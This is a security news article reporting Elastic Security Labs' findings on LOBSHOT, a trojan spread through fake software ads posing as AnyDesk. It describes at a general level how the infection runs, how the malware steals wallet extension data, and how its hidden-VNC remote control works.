Threat actors can use hVNC to covertly take control of compromised Windows PCs due to a new malware called “LOBSHOT” that was transmitted through Google advertisements. Many cybersecurity researchers noted an abrupt rise in threat actors using Google ads to spread malware in search results earlier this year. These marketing tactics mimicked the appearance of websites for various programs, including 7-ZIP, VLC, OBS, Notepad++, CCleaner, TradingView, Rufus, and many more.
Instead of disseminating genuine software, these websites promoted malware, including Gozi, RedLine, Vidar, Cobalt Strike, SectoRAT, and the Royal Ransomware. Researchers discovered that a new remote access trojan known as LOBSHOT was being disseminated using Google Ads in a recent study by Elastic Security Labs. These advertisements pointed to a bogus AnyDesk website at amydeecke[.]website while promoting the genuine AnyDesk remote management program.
A malicious MSI file was sent by this website, and it performed a PowerShell command to download a DLL from download-cdn[.]com, a website that has previously been linked to the TA505/Clop ransomware group. It is unknown if TA505 is still employing this domain. However, Proofpoint threat analyst Tommy Madjar once informed that it had earlier changed hands. The malware, known as LOBSHOT, is contained in the downloaded DLL file, which will be executed by RunDLL32.exe after being stored in the C:\ProgramData folder.
“We have observed over 500 unique LOBSHOT samples since last July. The samples we have observed are compiled as 32-bit DLLs or 32-bit executables typically ranging around 93 KB to 124 KB,” the Elastic Security Labs report explains.
Once it has been run, the malware will check to see if Microsoft Defender is currently active, and if it is, it will stop running to avoid detection. The malware will set up Registry entries to launch automatically when entering into Windows. Still, if Defender is not found, it will communicate system data from the infected computer, including active processes. The malware will also look for 32 extensions for cryptocurrency wallets on Chrome, nine for wallets on Edge, and 11 for wallets on Firefox.
The malware will execute a file at C:\ProgramData after listing the extensions. Elastic is unclear of whether that file was employed to steal the extension data or for some other reason because it wasn’t found in their research. Although it’s common for malware to steal cryptocurrency extensions, Elastic also discovered that the malware contained an hVNC module that allowed threat actors to covertly access an infected device remotely.
hVNC, or hidden virtual network computing, is a modified version of the VNC remote access software that allows users to operate a hidden desktop on an infected computer rather than the owner’s primary desktop. As a result, a threat actor can take remote control of a Windows desktop computer without the victim being aware of it. According to Elastic, LOBSHOT installs an hVNC module that enables threat actors to manage the concealed desktop using their keyboard and mouse as if they were in front of it.
“At this stage, the victim machine will start sending screen captures that represent the hidden desktop that is sent to a listening client controlled by the attacker,” explains Elastic. “The attacker interacts with the client by controlling the keyboard, clicking buttons, and moving the mouse, these capabilities provide the attacker full remote control of the device.”
The threat actors are in total control of the device when they use hVNC, allowing them to run commands, steal data, and even install other malware payloads. The malware is probably used to get initial access to corporate networks and to propagate laterally to additional devices because AnyDesk is widely used in commercial contexts. Data extortion, ransomware attacks, and other assaults could result from this access.
